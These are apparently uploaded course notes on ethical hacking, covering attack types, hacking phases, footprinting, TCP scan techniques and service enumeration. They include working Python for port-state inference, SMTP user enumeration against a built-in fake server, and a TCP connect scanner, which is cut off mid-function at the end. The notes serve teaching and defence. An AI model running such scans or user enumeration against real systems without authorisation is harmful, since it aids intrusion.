Ethical Hacking: Overview & Techniques

The document provides an overview of ethical hacking, emphasizing its role in identifying and mitigating security vulnerabilities in systems, networks, and applications. It outlines various techniques used by ethical hackers, including penetration testing, social engineering, and different types of attacks such as phishing and SQL injection. Additionally, it discusses the importance of footprinting, scanning, and enumeration as methods for gathering information about potential targets to enhance cybersecurity measures.

Uploaded by Gokul Krish

UNIT I

ETHICAL HACKING OVERVIEW & VULNERABILITIES

Understanding the importance of security; concept of ethical hacking and essential
terminologies:

Threat:
A threat is any circumstance, event or actor with the potential to harm a system,
network or application, for example by disclosing, altering or destroying data or by
denying service. Security exists to reduce the likelihood and impact of threats, and
ethical hacking is one of the ways an organization measures how well it is doing so.
Ethical hacking, also known as white-hat hacking and closely associated with
penetration testing, is the practice of intentionally probing computer systems,
networks, or applications for vulnerabilities and security weaknesses with the owner's
authorization. The primary objective is to identify and address security weaknesses
before malicious hackers can exploit them. Ethical hackers, often employed by
organizations or hired as consultants, use their knowledge and skills to assess the
security posture of a system, network, or application and provide recommendations
for improving it.
Ethical hacking is used for various purposes, all of which revolve around improving
the security of computer systems, networks, and applications. Here are some key uses of
ethical hacking:

 Identifying Vulnerabilities
Ethical hackers systematically search for weaknesses and vulnerabilities in software,
hardware, and network configurations. By doing so, they can pinpoint potential entry
points for cyberattacks.
 Assessing Security Posture:
Ethical hacking helps organizations assess their current security posture. This involves
understanding how well their defenses hold up against real-world hacking attempts.
 Risk Mitigation
Ethical hacking assists in identifying and prioritizing security risks. Organizations can
then mitigate these risks, reducing the likelihood of data breaches and cyberattacks.

 Compliance and Regulation


Many industries and organizations are subject to specific security standards and
regulations. Ethical hacking can help ensure compliance with requirements like the
Payment Card Industry Data Security Standard (PCI DSS), the Health Insurance
Portability and Accountability Act (HIPAA), or the General Data Protection
Regulation (GDPR).

 Security Awareness and Training:


Ethical hacking findings can be used to educate employees and users about
cybersecurity best practices and potential threats. This helps foster a security-
conscious culture within an organization.
 Incident Response Planning: Understanding vulnerabilities through
ethical hacking can assist organizations in developing robust incident
response plans. This ensures they are prepared to react effectively in a
security breach.
 Secure Software Development: Ethical hacking can be applied during
the development phase of software and applications to uncover and
address security flaws before they reach production.
 Third-Party Assessment: Organizations often work with third-party
vendors and service providers. Ethical hacking can be used to evaluate
the security of these external entities to ensure they meet security
requirements.
 Penetration Testing: Ethical hackers conduct penetration tests,
simulating real-world attacks to assess how well a system can withstand
hacking attempts. This helps organizations understand their
vulnerabilities and prioritize improvements.
 Continuous Improvement: Ethical hacking is an ongoing process. It
regularly monitors and evaluates an organization's security posture,
adapting to evolving threats and technologies.

Attack:
In ethical hacking, various types of attacks are employed to identify and address
vulnerabilities in systems. Common examples include:
1. Phishing Attacks: Simulating deceptive emails or messages to trick users
into revealing sensitive information.
2. SQL Injection: Exploiting vulnerabilities in database queries to gain
unauthorized access or manipulate data.
3. Cross-Site Scripting (XSS): Injecting malicious scripts into web pages
viewed by other users to compromise their data.
4. Man-in-the-Middle (MitM) Attacks: Intercepting and altering
communication between two parties to gain unauthorized access or manipulate
data.
5. Denial of Service (DoS) Attacks:Overloading a system or network to disrupt
its normal functioning and make it unavailable.
6. Buffer Overflow Attacks:Exploiting programming errors to overflow a
program's memory and execute malicious code.
7. Password Attacks: Attempting to crack passwords through methods like
brute force or dictionary attacks.
8. Social Engineering: Manipulating individuals to disclose confidential
information through psychological tactics.
9. Network Scanning: Identifying open ports, services, and vulnerabilities in a
network. Strictly this is reconnaissance rather than an attack, but it is the step a
target's monitoring is most likely to notice.
Ethical hackers use these techniques responsibly, with explicit permission, to
help organizations strengthen their security posture.

Vulnerabilities:
1. Security Misconfigurations
Security misconfigurations happen when an organization improperly configures or
fails to properly utilize all of a system’s security settings, enabling hackers to gain
access to its network. A security misconfiguration is often a precursor to a powerful
and aggressive attack on a network. Programs like the C|EH train ethical hackers to
spot security misconfigurations and then provide recommendations for how a
business can remedy them.
2. Injection Attacks
In an injection attack, a malicious actor supplies crafted input that the target
program passes on to an interpreter (a SQL engine, an operating-system shell, an LDAP
server) as code or commands, often gaining remote access to an organization's
network (IBM, 2014). Injection attacks are often precursors to larger-scale
cyberattacks on a database or website (IBM, 2014). However, appropriate security
controls (parameterized queries, input validation, least-privilege database accounts)
can stop the malicious injection of code and, if monitoring is in place, alert a network
administrator. There are many types of injection attacks, with SQL injection among
the most prevalent and damaging.
3. Vulnerable System Components
One of the fundamental challenges in network security is ensuring that all aspects of
a network’s systems are secure and up to date—a network is only as secure as its
individual components. Using components with known vulnerabilities can create
serious network security problems. Ethical hackers can identify these vulnerabilities
and determine how to fix them. These fixes may include making improvements to
existing security programs and providing recommendations for better security
software.
4. Social Engineering
Malicious actors use social engineering tactics to break into an organization’s
network by inducing individuals to provide information that enables the hacker to
gain illicit access to the organization’s systems (National Institute of Standards and
Technology, n.d.). Social engineering attacks may involve, for example, a malicious
actor posing as a network administrator and sending out a phishing email to an
organization’s members. If users are tricked into giving out their usernames and
passwords, the attacker can gain unlawful access to the company’s network.
Ensuring that employees are aware of social engineering and phishing techniques
can lower the odds that such attacks will be successful (EC-Council, 2021a). A
company is only as strong as its weakest link. Ethical hacking can help identify these
weak links.
5. Authentication Vulnerabilities
Although every network has an authentication process, some networks have
particular vulnerabilities that allow a skilled hacker to bypass these authentication
measures and breach the network. A C|EH is trained to know what these
vulnerabilities are, where to find them, and how to spot them.

Target of Evaluation and Exploit:

The Target of Evaluation (TOE) is the system, product or component whose security
is being assessed; the term comes from the Common Criteria evaluation standard. An
exploit is a piece of code or a technique that takes advantage of a specific
vulnerability in the TOE. In ethical hacking the goal is to identify vulnerabilities
within the TOE and exploit them in a controlled way for the purpose of assessing its
security. This involves simulating real-world attack scenarios to evaluate the
system's defenses.
Ethical hackers perform controlled and authorized exploits to:
1. Identify Weaknesses: Discover vulnerabilities that could be exploited by
malicious actors.
2. Evaluate Defenses: Assess the effectiveness of security measures in place.
3. Provide Recommendations: Offer insights and recommendations to
strengthen the security of the TOE.
It's crucial to conduct such activities within a well-defined scope, with explicit
permission, and in alignment with legal and ethical standards. The ultimate aim
is to enhance the security of the system by addressing and mitigating identified
vulnerabilities.
Phases involved in hacking:
There are five main phases in hacking. A hacker does not necessarily follow these
five steps in strict sequence, but they form a stepwise process that yields better
results when followed.
1. Reconnaissance:
This is the first step of hacking, also called the footprinting and information
gathering phase. It is the preparatory phase where we collect as much information as
possible about the target. We usually collect information about three groups:
 Network
 Host
 People involved
There are two types of footprinting:
Active: Directly interacting with the target to gather information about it, e.g.
using the Nmap tool to scan the target. The target can observe and log this activity.
Passive: Collecting information about the target without directly accessing it,
for example from social media, public websites, DNS and WHOIS records.
2. Scanning:
Three types of scanning are involved:
Port scanning: Scanning the target for information such as open ports, live systems
and the services running on each host.
Vulnerability scanning: Checking the target for weaknesses or vulnerabilities that
can be exploited, usually with the help of automated tools.
Network mapping: Finding the topology of the network (routers, firewalls, servers if
any) and host information, and drawing a network diagram from the available
information. This map serves as a valuable reference throughout the hacking process.
3. Gaining Access:
This is the phase where an attacker breaks into the system or network using various
tools or methods. After entering a system, the attacker typically escalates privilege
to administrator or root level in order to install tools, modify data or hide data.
4. Maintaining Access:
A hacker may hack a system merely to show that it was vulnerable, or may want to
persist in the background without the knowledge of the user. This is done with
Trojans, rootkits, backdoor accounts or scheduled tasks. The aim is to keep access to
the target until the planned tasks have been accomplished.
5. Clearing Tracks:
No thief wants to get caught. A careful hacker removes evidence so that no traces
lead back to them later. To achieve this, the hacker modifies, corrupts or deletes log
entries, alters registry values, uninstalls the applications used, and deletes the
folders created. For defenders this is why logs should be forwarded to a separate,
write-protected collector as they are generated, and why a compromised site must be
investigated and rebuilt promptly to limit the damage and prevent further
unauthorized access.

Unit-II
Footprinting
Footprinting means gathering information about a target system that can be used to
plan a successful cyber attack. To get this information, a hacker may use various
methods and tools. This information is the hacker's first step towards compromising a
system. There are two types of footprinting:
 Active Footprinting: gathering information by interacting directly with the target
(port scans, banner grabs, DNS queries against the target's own servers), which the
target can detect and log.
 Passive Footprinting: gathering information from third-party and public sources
(search engines, social media, WHOIS databases, archived pages) without sending any
traffic to the target itself.
Different kinds of information that can be gathered from Footprinting are
as follows:
 The operating system of the target machine
 Firewall
 IP address
 Network map
 Security configurations of the target machine
 Email id, password
 Server configurations
 URLs
 VPN
Sources are as follows:
 Social Media: Most people tend to post a great deal of personal information online,
and hackers treat it as a valuable source. They may create a convincing fake account
to be added as a friend or to follow someone so as to harvest that information.
 Job websites: Organizations leak configuration details on job sites such as
[Link]. For example, a company posts "Job Opening for Lighttpd 2.0 Server
Administrator"; from this an attacker learns that the organization runs the Lighttpd
web server, version 2.0, and can look up vulnerabilities for that exact version.
 Google: Search engines such as Google can perform far more powerful searches than
most users realize. Attackers use this in what has been termed Google hacking: basic
search terms combined with advanced search operators such as "inurl:", "allinurl:"
and "filetype:" can uncover a great deal. For example, Internet-connected devices can
be found; a search string such as inurl:"ViewerFrame?Mode=" finds publicly exposed
web cameras. The "link:" search operator that Google used to offer was turned off in
2017. Google can thus be used to uncover sensitive information that should never have
been published. The term "Google dork" originally referred to the people who
carelessly post such information, and is now also used for the search strings
themselves.
 Social Engineering: Various techniques fall in this category. A few of them are:
 Eavesdropping: The attacker tries to record or overhear the victim's personal
conversations held over a communication medium such as the telephone.
 Shoulder Surfing: The attacker tries to capture personal information such as an
email address or password by looking over the victim's shoulder while the victim is
typing or writing it.
 [Link]: An archived version is an older copy of a website as it existed at some
earlier time, before features were changed. [Link] collects snapshots of websites
at regular intervals. It can be used to retrieve information (old staff lists, removed
pages, earlier technology choices) that no longer exists on the live site.
 An Organization's Website: This is the best place for an attacker to begin. Open-
source information, meaning information the organization freely provides to clients,
customers or the general public, is most easily found on the organization's own
website.
 Using NeoTrace: NeoTrace is a GUI route-tracing tool. It displays the route between
you and the remote site graphically, including all intermediate nodes, and shows
information on each node such as IP address, contact information and location.
 Whois: The WHOIS service publishes registration data for domain names and IP
address blocks, such as the registrar, name servers, registrant organization and
contact email addresses (though much of this is now redacted for privacy). Querying it
is a basic step in website footprinting.
Advantages:
 Footprinting allows hackers to learn the basic security configuration of a target
machine along with the network route and data flow.
 Once the attacker finds vulnerabilities, he or she can focus on a specific area of the
target machine.
 It allows the hacker to identify which attack is most likely to succeed against the
target system.
Counter Measures:
 Avoid posting confidential data on social media websites.
 Avoid accepting unsolicited friend requests on social media platforms.
 Educate staff about the footprinting and social engineering tricks described above.
 Footprint your own organization periodically to identify and remove sensitive
information from social media and other public sources.
 Configure web servers properly (suppress version banners, disable directory listing,
remove default pages) so that they do not leak system configuration details.

Methods of Information Gathering


There are the following three methods of information gathering:

1. Footprinting
2. Scanning
3. Enumeration

Footprinting

In this technique, as much information as possible is collected about the target
network, system or person. Footprinting reveals the possible ways to intrude into an
organization's systems and gives a first picture of the target's security posture. It
can be active as well as passive. In passive footprinting, information is collected
from public and third-party sources without touching the target, so the target is
unaware of it. In active footprinting the attacker interacts directly with the target
(for example by probing its servers), which the target can observe and log.
Footprinting techniques are three types. These are as follows:

o Open source footprinting


o Network-based footprinting
o DNS interrogation

Open source footprinting

Open source footprinting is the safest form of footprinting for the attacker: it
relies only on publicly available information, so it is generally legal and does not
generate traffic the target could detect. Hackers can therefore do it without fear.
Examples include looking up someone's date of birth, phone number or age, finding
someone's email address, and using automated tools to gather the IP ranges registered
to an organization. Most companies publish information about themselves on their
official websites, and hackers take full advantage of it.

Network-based Footprinting
Network-based footprinting is used to retrieve information such as the network
services offered, names within a workgroup or domain, user names, and data shared
among users.

DNS interrogation
After gathering the required information from the other sources, the hacker uses
existing tools to query the target's DNS for host names, mail servers and, where
misconfigured, full zone transfers. DNS interrogation can be performed with many free
command-line and online tools.

Objectives of Footprinting
Network information collection: Footprinting is used to collect information about
the network such as protocols used, authentication mechanisms, internal and external
domain names, existing VPNs, reachable systems and their IP addresses, and digital and
analog telephone numbers.

System information collection: Footprinting is used to collect information about the
systems such as group names and users, routing protocols and routing tables, operating
systems in use, system banners, SNMP information, remote system type, system
architecture, and user names and passwords that have leaked.

Organization information collection: Footprinting is used to collect information
about the organization such as employee details, location details, security policies
in place, the company directory, addresses and phone numbers, the organization's
website, links and comments in its HTML source code, news articles and press
releases.
Scanning

Scanning is the step that follows footprinting and consists of a set of techniques and
procedures for identifying hosts, ports and services on a network. It is part of the
information gathering and intelligence gathering mechanism an attacker uses to build
an overall picture of the target. To find out where attacks are possible, pen-testers
use vulnerability scanning, which finds weaknesses such as weak authentication,
unnecessary services, missing patches and weak encryption algorithms. The ethical
hacker or pen-tester then reports the list of all vulnerabilities found in the
organization's network.

There are three types of scanning

o Port scanning
o Network scanning
o Vulnerability scanning

Port scanning
Hackers and penetration testers use this conventional technique to search for open
doors through which a system can be accessed. During this scan the attacker identifies
the live hosts, the topology of the target organization, the firewalls installed, the
devices attached to the network, the operating systems in use, and so on. Once the
attacker has the victim organization's IP addresses, scanning their TCP (Transmission
Control Protocol) and UDP (User Datagram Protocol) ports lets him map the
organization's network. Nmap is the most common port scanner; Amap is used afterwards
to identify which application protocol is actually speaking on each open port.

Network scanning
You should understand the TCP three-way handshake before learning the port scanning
techniques, because most of them work by sending only part of it. Handshaking is the
automated process by which two entities establish a connection using an agreed
protocol. The client sends a SYN (synchronize) packet to the server to request a
connection. The server, if the port is listening, responds with a SYN/ACK packet. The
client completes the handshake by sending an ACK (acknowledge) packet. A closed port
answers the initial SYN with an RST (reset) instead of a SYN/ACK, and a filtered port
answers nothing at all; the scan types below exploit these different responses.

There are various scans used by scanning techniques, which are as follows:

SYN scan: Also called a half-open or stealth scan, the SYN scan never completes the
TCP three-way handshake. The hacker sends a SYN packet to the target. If a SYN/ACK
comes back, the port is open and listening; the scanner then sends an RST rather than
the final ACK so that no connection is established. If the target replies with an RST,
the port is closed. No reply or an ICMP unreachable error means the port is filtered.
Because the handshake is never completed, the application behind the port never sees a
connection and does not log one, which is why the SYN scan was considered stealthy;
modern IDS and firewalls detect half-open scans easily.

XMAS scan: This scan sends a packet with the PSH, FIN and URG flags set. Per RFC 793 an
open port silently discards such a packet, so no response means the port is open (or
filtered, since a firewall dropping the packet looks the same). A closed port responds
with an RST. Windows and some other stacks reply with an RST regardless of port state,
so against them every port appears closed.

FIN scan: The FIN scan is almost the same as the XMAS scan except that it does not set
PSH and URG; it only sends a packet with the FIN flag. The responses and the
limitations of the FIN scan are the same as for the XMAS scan.

IDLE scan: This scan uses a third host, the "zombie", whose IP identification (IP ID)
field increases predictably with every packet it sends. The attacker records the
zombie's IP ID, sends a SYN to the target spoofed with the zombie's IP address, and
then probes the zombie again. If the target port was open it sent a SYN/ACK to the
zombie, which answered with an RST and so incremented its IP ID by one extra step; if
the port was closed the target sent an RST, which the zombie ignored. Whether the port
is open is therefore inferred from the change in the zombie's IP ID, and the target
only ever sees the zombie's address.

Inverse TCP flag scan: In this scan the attacker sends a TCP probe with no flags set
(NULL scan) or with a single unusual flag. As with the FIN scan, no response means the
port is open or filtered, and an RST means the port is closed.

ACK flag probe scan: In this scan the attacker sends TCP probes with only the ACK
flag set and analyzes the replies. Both open and closed ports answer an unsolicited ACK
with an RST, so this scan cannot tell open from closed; instead it reveals the
filtering in front of the target. A port that returns an RST is unfiltered, while one
that returns nothing or an ICMP unreachable error is protected by a stateful firewall.
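The decision rules for these scan types, as an added Python example that is not part of the original notes: classify() encodes the port-state inference for each probe type, and idle_scan_verdict() encodes the IP ID arithmetic of the IDLE scan. The response values are constructed stand-ins for what a scanner would read from captured packets; the code sends nothing on the network.

```python
"""Port-state inference for the TCP scan types described above.

Added example, not from the original notes.  A 'response' is a constructed
stand-in for what the scanner captured: a string of the TCP flags set in the
reply ("SA" = SYN/ACK, "R" or "RA" = RST), ICMP_UNREACH for an ICMP type 3
unreachable error, or None when nothing came back after retransmission.
"""
from __future__ import annotations

ICMP_UNREACH = "ICMP_UNREACH"


def classify(probe: str, response: str | None) -> str:
    """Return the port state inferred for PROBE given RESPONSE.

    probe is one of "SYN", "FIN", "XMAS", "NULL", "ACK".  The rules follow
    RFC 793; stacks such as Windows that answer FIN/XMAS/NULL probes with RST
    on every port make all ports look "closed" to those three probes.
    """
    if probe == "SYN":
        if response is None or response == ICMP_UNREACH:
            return "filtered"          # dropped, or a firewall answered for it
        if "S" in response and "A" in response:
            return "open"              # SYN/ACK: a socket is listening
        if "R" in response:
            return "closed"            # RST: nothing listening
        return "unknown"
    if probe in ("FIN", "XMAS", "NULL"):
        # An open port silently discards these probes and a closed port
        # answers RST, so silence cannot distinguish open from filtered.
        if response is None:
            return "open|filtered"
        if response == ICMP_UNREACH:
            return "filtered"
        if "R" in response:
            return "closed"
        return "unknown"
    if probe == "ACK":
        # Open and closed ports both answer an unsolicited ACK with RST:
        # this probe only tells us whether a stateful filter is in the way.
        if response is not None and response != ICMP_UNREACH and "R" in response:
            return "unfiltered"
        return "filtered"
    raise ValueError(f"unknown probe type {probe!r}")


def idle_scan_verdict(ipid_before: int, ipid_after: int) -> str:
    """Infer the target's port state from the zombie's IP ID change.

    ipid_before: zombie's IP ID from the attacker's first probe.
    ipid_after:  zombie's IP ID from the probe sent after the spoofed SYN.
    With a zombie that increments IP ID by 1 per packet it sends:
      +1 -> zombie only answered our second probe (target sent RST or nothing)
      +2 -> zombie also answered a SYN/ACK from the target with an RST: open
    """
    delta = (ipid_after - ipid_before) % 65536     # IP ID is a 16-bit counter
    if delta == 1:
        return "closed|filtered"
    if delta == 2:
        return "open"
    return "unreliable zombie"   # other traffic reached the zombie; pick another


def scan_table() -> dict[tuple[str, str | None], str]:
    """Every (probe, response) pair from the text and the state it implies."""
    responses = ["SA", "RA", ICMP_UNREACH, None]
    return {(p, r): classify(p, r)
            for p in ("SYN", "FIN", "XMAS", "NULL", "ACK") for r in responses}


if __name__ == "__main__":
    for (probe, resp), state in scan_table().items():
        print(f"{probe:5} probe, reply {str(resp):12} -> {state}")
```

Running the script prints the full probe/response table, which is the same table Nmap's -sS, -sF, -sX, -sN, -sA and -sI options implement. Note that the only probe that ever yields a plain "open" verdict from a single reply is the SYN scan; the flag-based scans can only say "open|filtered", and the ACK probe says nothing about open versus closed at all.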


Vulnerability scanning
Vulnerability scanning is the proactive identification of vulnerabilities on the target
network. Using automated scanning tools with some manual verification, vulnerabilities
and threats can be identified. The scanner needs network access to the targets and an
up-to-date vulnerability feed (signatures, CVE data), which is why scanners are usually
given Internet access or a regularly updated offline feed.

The ports and network can be scanned by the following tools:

Nmap: The standard network scanner. It finds live hosts on a network, scans their
ports, and uses service and OS fingerprinting to report the operating system and its
version, the type of packet filter or firewall in the path, and the service versions
on open ports.

Angry IP Scanner: A fast, cross-platform scanner used to check which systems in a
given address range are alive and which ports they have open.

Hping2/Hping3: Command-line TCP/IP packet crafting tools. They assemble arbitrary
TCP, UDP, ICMP and raw IP packets, which makes them useful for custom scans, firewall
rule testing and traceroute-style probing.

SuperScan: A Windows TCP port scanner originally developed by Foundstone (later part
of McAfee). It is also used for ping sweeps and host name resolution.

Zenmap: The official graphical front end for Nmap. It is used to run port scans, ping
sweeps and OS and version detection, and to compare scan results over time.

NetScanTools: A suite of many tools in one package, used for port scanning, ping
sweeps and a range of other network reconnaissance tasks. A trial version is
available alongside the paid version.

Objective of Network scanning


o Network scanning is used to find the open ports, live hosts, IP address of the
target.
o Network scanning is used to find the services which are running on the computer
of a target.
o Network scanning is used to find the system architecture and operating system of
the victim.
o Network scanning is used to find and deal with vulnerabilities.

Enumeration

Enumeration is the process of extracting information from a system such as machine
names, user names, network resources, shares and services. In enumeration the hacker
establishes an active connection with the system and uses it to gain more information
about the target through direct queries. The outcome of the enumeration phase is very
useful to an attacker who wants to exploit the system directly. Because it involves
real connections and queries that the target can log and alert on, the enumeration
phase is considered the noisiest and riskiest part of reconnaissance in a penetration
test.

There are various types of enumeration. These are as follows:

NetBIOS Enumeration: NetBIOS stands for Network Basic Input Output System; it was
developed by Sytek for IBM. To enumerate NetBIOS on a Windows host, File and Printer
Sharing must be enabled, which exposes NetBIOS over TCP/IP on ports 137, 138 and 139.
An attacker can then list the machine's name table, shares and, on poorly configured
hosts, user accounts, and can also abuse the service for denial-of-service attacks.

SNMP Enumeration: SNMP stands for Simple Network Management Protocol. It is used to
manage devices such as routers and switches that run on the Internet Protocol (IP). It
is based on a manager/agent architecture: every managed device runs an SNMP agent,
and the management station communicates with it through requests and responses (UDP
port 161). The agent exposes the device's configurable variables through the
Management Information Base (MIB). Access in SNMPv1 and v2c is controlled only by a
community string, and devices are often left with the defaults "public" (read) and
"private" (read/write). Using SNMP enumeration against such devices an attacker can
obtain device-specific information, interface and traffic statistics, the ARP table
and routing tables, and details of network resources such as devices and shares.

LDAP Enumeration: LDAP stands for Lightweight Directory Access Protocol. It is based on
the client-server architecture and is used to access distributed directory services. A
directory service stores user records in a logical, hierarchical structure. Information
is transmitted between client and server encoded with BER (Basic Encoding Rules) over
TCP, normally port 389 (636 for LDAPS). If the server permits anonymous binds and
remote queries, sensitive information about users such as contact details, addresses,
user names and department details can be read without credentials.

NTP Enumeration: NTP stands for Network Time Protocol. It synchronizes the clocks of
networked computers and, under ideal conditions, achieves better than one millisecond
accuracy on a local area network and tens of milliseconds over the Internet. It is
based on the client-server architecture and works over UDP port 123. The NTP client
queries the NTP server. If an attacker can query an NTP server that still answers the
legacy monitoring commands (monlist, for example), they can enumerate the list of hosts
that synchronize with that server, along with the operating system, host names and IP
addresses of the internal clients.

SMTP Enumeration: SMTP stands for Simple Mail Transfer Protocol. It is used to
transmit electronic mail. It is based on the client-server architecture and works over
TCP port 25 (587 for submission, 465 for SMTPS). To route mail to a domain, the sender
looks up that domain's MX (mail exchanger) record in DNS. SMTP provides the following
built-in commands that are useful for enumeration:

VRFY: Asks the server to validate a user name or mailbox.

EXPN: Asks the server to expand a mailing list or alias and return the delivery
addresses.

RCPT TO: Specifies a recipient of the message.

The SMTP server's responses to these commands differ depending on whether the user
exists (typically 250 for a valid user and 550 for an unknown one). Because of these
varied responses, SMTP enumeration is possible: an attacker can discover valid users on
the SMTP server. Hardened servers disable VRFY and EXPN or answer 252 to every query,
in which case the attacker falls back to RCPT TO, which a server must evaluate to
deliver mail.
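The VRFY/RCPT TO enumeration described above, as an added Python example that is not part of the original notes. Because the script must run offline it brings its own target: a constructed in-process SMTP responder whose hostname (mail.example.test), mailbox names (alice, bob, postmaster) and 252 "hardened" mode are all invented. The client side uses only the standard library's smtplib.

```python
"""SMTP user enumeration with VRFY, EXPN and RCPT TO.

Added example, not part of the original notes.  The target is a constructed
in-process fake SMTP server so the script runs offline; mail.example.test,
scanner.test and the mailbox names are invented.
"""
import smtplib
import socketserver
import threading


class FakeSMTPHandler(socketserver.StreamRequestHandler):
    """Constructed target: just enough RFC 5321 to answer the three verbs."""
    known_users = {"alice", "bob", "postmaster"}
    vrfy_enabled = True        # False models a hardened server (252 reply)

    def reply(self, line):
        self.wfile.write((line + "\r\n").encode())

    def handle(self):
        self.reply("220 mail.example.test ESMTP")
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            # "alice", "alice@example.test", "TO:<alice@example.test>" -> "alice"
            user = arg.split("@")[0].split(":")[-1].strip("<> ").lower()
            if verb in ("HELO", "EHLO"):
                self.reply("250 mail.example.test")
            elif verb == "MAIL":
                self.reply("250 OK")
            elif verb in ("VRFY", "EXPN"):
                if not self.vrfy_enabled:
                    self.reply("252 Cannot VRFY user, but will accept message")
                elif user in self.known_users:
                    self.reply(f"250 {user} <{user}@example.test>")
                else:
                    self.reply("550 5.1.1 User unknown")
            elif verb == "RCPT":
                ok = user in self.known_users
                self.reply("250 OK" if ok else "550 5.1.1 User unknown")
            elif verb == "QUIT":
                self.reply("221 Bye")
                return
            else:
                self.reply("502 Command not implemented")


def enumerate_users(host, port, candidates, domain="example.test"):
    """Return {candidate: "valid" | "invalid" | "ambiguous"}.

    VRFY is tried first; anything the server will not answer (252, 502 ...)
    is re-tested with RCPT TO inside a single MAIL transaction.  A canary
    recipient that cannot exist detects catch-all servers, whose RCPT TO
    replies prove nothing.
    """
    results, unresolved = {}, []
    with smtplib.SMTP(host, port, local_hostname="scanner.test", timeout=5) as smtp:
        smtp.ehlo()
        for user in candidates:
            code, _ = smtp.verify(user)
            if code == 250:
                results[user] = "valid"
            elif code in (550, 551, 553):
                results[user] = "invalid"
            else:
                unresolved.append(user)
        if unresolved:
            smtp.mail(f"probe@{domain}")
            canary, _ = smtp.rcpt(f"zq7x9v3k-no-such-user@{domain}")
            for user in unresolved:
                code, _ = smtp.rcpt(f"{user}@{domain}")
                if canary == 250:
                    results[user] = "ambiguous"          # catch-all server
                elif code in (250, 251):
                    results[user] = "valid"
                elif code in (550, 551, 553):
                    results[user] = "invalid"
                else:
                    results[user] = "ambiguous"
    return results


def demo(vrfy_enabled=True):
    """Enumerate against the constructed target; return the verdicts."""
    FakeSMTPHandler.vrfy_enabled = vrfy_enabled
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSMTPHandler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return enumerate_users("127.0.0.1", server.server_address[1],
                               ["alice", "bob", "carol"])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print("VRFY enabled :", demo(True))
    print("VRFY disabled:", demo(False))
```

Both runs identify alice and bob and reject carol: disabling VRFY only forces the client onto the RCPT TO path, which is why disabling VRFY and EXPN alone is not a complete defence. The countermeasure that actually works is making RCPT TO uninformative (a catch-all or uniform deferral) together with rate limiting and logging of repeated RCPT failures from one client; the canary check in enumerate_users() shows what such a server looks like from the attacker's side.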

DNS Enumeration: DNS stands for Domain Name System. DNS stores records in a
distributed database. The most commonly used record types are as follows:

o Domain name aliases (CNAME)
o IP addresses (A and AAAA)
o Name servers (NS)
o Start of authority (SOA)
o Pointers for reverse DNS lookups (PTR)
o Mail exchangers (MX)

DNS works over both TCP (Transmission Control Protocol) and UDP (User Datagram
Protocol) on port 53. UDP is used for ordinary queries, and TCP is used for zone
transfers and for responses too large for UDP. A zone transfer (AXFR) replicates the
whole zone from the primary server to the secondary servers. DNS enumeration is
possible when the primary server accepts a zone transfer request from anyone, so an
attacker posing as a secondary server receives every record in the zone, revealing
internal host names and addresses. Zone transfers should be restricted to the
addresses of the legitimate secondaries.


Windows Enumeration: Windows hosts can be enumerated with the built-in tools
together with the Sysinternals suite. Many more Sysinternals tools can be downloaded
from [Link]

Linux/UNIX Enumeration: Linux and Unix hosts can be enumerated with the multiple
command-line utilities provided by the operating system itself.


Port Scan in Ethical Hacking

Port scanning is the technique used to identify open ports and the services listening on
hosts in a network. Security engineers use it to check systems for exposed services and
vulnerabilities, and attackers use it to select targets. A scanner sends connection requests
(or single probe packets) to each port of the target and records how the host answers.
Network scanners do not by themselves harm computers; the requests resemble those a user
sends when visiting a website or connecting with an application such as Remote Desktop
Protocol (RDP) or Telnet, only sent to many ports in quick succession. Note that a port
scan is a TCP or UDP probe, not an ICMP message: an ICMP echo request (Type 8) and the
echo reply it elicits (Type 0) are used for host discovery (the ping sweep described
below), which usually precedes the port scan. For TCP, a SYN answered by SYN/ACK means
the port is open, a RST means it is closed, and no answer at all usually means a firewall
dropped the probe.

Types of Port Scans:

To protect your network from port scans, it is essential to understand the
different types of port scans used by hackers.
 Vanilla: The scanner tries to complete a full TCP connection to all 65,535 ports.
 UDP: The scanner looks for open UDP ports; because UDP has no handshake, a port is
reported as open or filtered when no ICMP "port unreachable" message comes back.
 Sweep: The scanner probes the same port on many computers to see which hosts are
active.
 FTP Bounce: The scanner relays the probes through an FTP server (using its PORT
command) to mask the source of the scan.
 Stealth (SYN or half-open): The scanner sends a SYN and never completes the
handshake, so the connection attempt is not logged by the application on the scanned
computer.

Types of Ports:

 Open: The host replies and announces that a service is listening and accepting
connections. An unintended open port is an attack path into the network.
 Closed: The host responds (with a RST for TCP, or ICMP port unreachable for UDP) but
no application is listening. Attackers rescan these later in case a service is started.
 Filtered: The host does not respond to the probe at all. This usually means that a
firewall dropped the packet, though packet loss or congestion can look the same.
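The three port states above come straight out of how a TCP connect() probe ends. The
following script, added here as an example and not taken from the original notes or from
Nmap, performs the same full three-way-handshake probe as "nmap -sT" (so it needs neither
raw sockets nor root) and maps each outcome to open, closed or filtered. The target host
and the port list in the demo are assumptions.

```python
"""TCP connect scanner that classifies ports as open, closed or filtered.

Added example for these notes; it is not code from the original text or from
Nmap. It makes the same full three-way handshake probe as "nmap -sT", so it
needs neither raw sockets nor root. The host and port list in the demo are
assumptions.
"""
import socket
from concurrent.futures import ThreadPoolExecutor

OPEN, CLOSED, FILTERED = "open", "closed", "filtered"


def classify_outcome(error):
    """Map the result of connect() to the three port states.

    error is None when the handshake completed (the host answered SYN with
    SYN/ACK), a ConnectionRefusedError when the host answered with RST
    (no listener) and a timeout when nothing came back at all, which is what
    a firewall that silently drops the probe looks like.
    """
    if error is None:
        return OPEN
    if isinstance(error, ConnectionRefusedError):
        return CLOSED
    if isinstance(error, (socket.timeout, TimeoutError)):
        return FILTERED
    # No route, host unreachable etc. are reported by name so they are not
    # mistaken for a firewall.
    return "error:" + type(error).__name__


def probe(host, port, timeout=1.0):
    """Try a full TCP connect to host:port and return its state."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            error = None
        except OSError as e:   # refused, timeout and unreachable are all OSError
            error = e
    return classify_outcome(error)


def scan(host, ports, timeout=1.0, workers=50):
    """Probe the ports concurrently; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return dict(zip(ports, states))


def open_ports(results):
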